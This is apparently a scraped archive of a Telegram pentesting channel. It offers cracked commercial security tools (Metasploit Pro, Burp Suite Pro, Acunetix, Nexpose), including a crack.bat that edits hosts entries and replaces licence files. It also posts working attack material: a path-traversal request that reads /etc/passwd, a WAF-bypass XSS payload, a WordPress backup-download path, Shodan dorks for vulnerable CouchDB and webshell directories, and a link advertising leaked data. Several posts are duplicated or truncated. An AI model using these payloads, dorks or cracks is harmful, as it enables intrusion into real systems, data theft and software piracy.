en
Feedback
Эффект пентестера

Эффект пентестера

Open in Telegram
2 261
Subscribers
No data24 hours
+37 days
-1030 days
Posts Archive
#soft metasploit pro - download Invicti Standard - download Burp Suite Pro - download Acunetix 14.9 - download Nexpose 6.6.15 - download

Rapid7 InsightVM/Nexpose 6.6.156 release 2022 August 17 windows
New
Vulnerability proof. We added the vulnerability proof to the vulnerability investigation pop-up.

Fixed
The Database Export Report has been removed from the Security Console and from documentation.
An issue was fixed so that the Scan Assistant for Windows no longer results in incomplete fingerprints.
#nexpose

This is from the latest Acunetix dist. Since many people downloaded the old file this is the only change. Just put it in with other install files and run it as admin to automate crack install. This is for people who had trouble with the manual directions. Full archive will be uploaded now for people who didn't get it yet, this time with bat file included. -z
** NEW **
Now you can just run the crack.bat file which should automatically do the steps for you.
It must be run as admin (the script will try to elevate if you don't, and let you know)
It will add the hosts entries if they aren't already there, it'll stop and start the
service as needed, copy over the license files and set permissions, etc.
** NEW **
#acunetix

re-up with fixed bat file and instructions (not needed if you use bat file) -z #acunetix

BurpSuite Professional x64 2022.9 with AUTO UPDATE again -ZEN 20220913 ! ABOUT BURPSUITE PRO Everyone knows this web auditing tool. Burpsuite Pro is the defacto bug bounty tool and integrated platform for performing security testing of web applications. Its various tools work seamlessly together to
support the entire testing process, from initial mapping and analysis of an application’s
attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
#burp

#invicti

Metasploit latest with crack that has been universal for a long time similar to nexpose universal. This has working Rapid PenTest, etc. No trial required. -z #metasploit

+2
This is from the latest Acunetix dist. Since many people downloaded the old file this is the only change. Just put it in with other install files and run it as admin to automate crack install. This is for people who had trouble with the manual directions. Full archive will be uploaded now for people who didn't get it yet, this time with bat file included. -z
** NEW **
Now you can just run the crack.bat file which should automatically do the steps for you.
It must be run as admin (the script will try to elevate if you don't, and let you know)
It will add the hosts entries if they aren't already there, it'll stop and start the
service as needed, copy over the license files and set permissions, etc.
** NEW **

Rapid7 InsightVM/Nexpose 6.6.156 release 2022 August 17 windows
New
Vulnerability proof. We added the vulnerability proof to the vulnerability investigation pop-up.

Fixed
The Database Export Report has been removed from the Security Console and from documentation.
An issue was fixed so that the Scan Assistant for Windows no longer results in incomplete fingerprints.

Out Of Band Update: Cobalt Strike 4.7.1 | Cobalt Strike CVE-2022-39197 XSS2RCE ! CS version<=4.7 https://www.cobaltstrike.com/blog/out-of-band-update-cobalt-strike-4-7-1/

CVE-2022-37299 (Shirne CMS 1.2.0. Path Traversal) Poc: GET /static/ueditor/php/controller.php?action=proxy&remote=php://filte
CVE-2022-37299 (Shirne CMS 1.2.0. Path Traversal) Poc: GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test

Repost from N/a
Akamai WAF bypass <A href="javascrip%09t&colon;eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here

OS Command Injection in Openssl CVE-2022-1292

Repost from N/a
#apache CouchDB 3.2.1 Remote code execution : #CVE -2022-24706 #Dorks #Shodan: port:4369 "name couchdb at" #ZoomEye: port:"43
#apache CouchDB 3.2.1 Remote code execution : #CVE -2022-24706 #Dorks #Shodan: port:4369 "name couchdb at" #ZoomEye: port:"4369"+"epmd_port"

Interesting collections of data leaks !! http://185.149.41.46/
Interesting collections of data leaks !! http://185.149.41.46/

Repost from N/a
WordPress Plugin Duplicator < 1.4.7 Backup download. The backup file can be downloaded using the "is_daws" parameter. url/backups-dup-lite/dup-installer/main.installer.php

GitHub - Ruia-ruia/CVE-2022-29582-Exploit: Exploit for CVE-2022-29582 targeting Google's Kernel CTF - https://github.com/Ruia-ruia/CVE-2022-29582-Exploit

Apache CouchDB Unauthorized RCE Vulnerability (CVE-2022-24706) https://youtu.be/9FrsVPzqfUE 来自

CVE-2022-35650: Moodle, occurs due to input validation error when importing lesson questions. This insufficient path checks r
CVE-2022-35650: Moodle, occurs due to input validation error when importing lesson questions. This insufficient path checks results in arbitrary file read risk. PoC https://0x1337.ninja/2022/07/30/cve-2022-35650-analysis/

Dorks : "inurl: /sym404/root/" or "inurl: /sym404/"
Dorks : "inurl: /sym404/root/" or "inurl: /sym404/"